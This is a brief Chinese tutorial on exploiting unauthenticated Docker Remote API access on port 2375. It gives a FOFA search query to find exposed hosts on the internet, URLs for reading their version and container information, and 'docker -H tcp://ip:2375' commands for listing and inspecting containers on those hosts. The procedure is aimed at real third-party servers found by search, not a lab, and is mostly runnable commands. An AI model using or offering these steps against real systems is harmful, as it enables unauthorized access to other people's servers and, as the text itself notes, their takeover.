DockerRemoteAPI未授权访问漏洞复现

一、漏洞信息 Docker Remote API如配置不当可导致未授权访问，被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据，可能导致敏感信息泄露，⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感 信息，或对敏感⽂件进⾏修改，最终完全控制服务器。 二、漏洞复现

1.使用以下fofa语句对docker产品进行搜索：

port="2375"

2.在搜索的结果网站后访问以下路径

http://ip:2375/version #查看版本信息 http://ip:2375/info #查看容器信息

3.可以使用-H参数连接目标主机的docker

docker -H tcp://ip:2375 ps #查看目标主机运行的镜像 docker -H tcp://ip:2375 version #查看目标主机的版本信息 docker -H tcp://ip:2375 info #查看目标主机的容器信息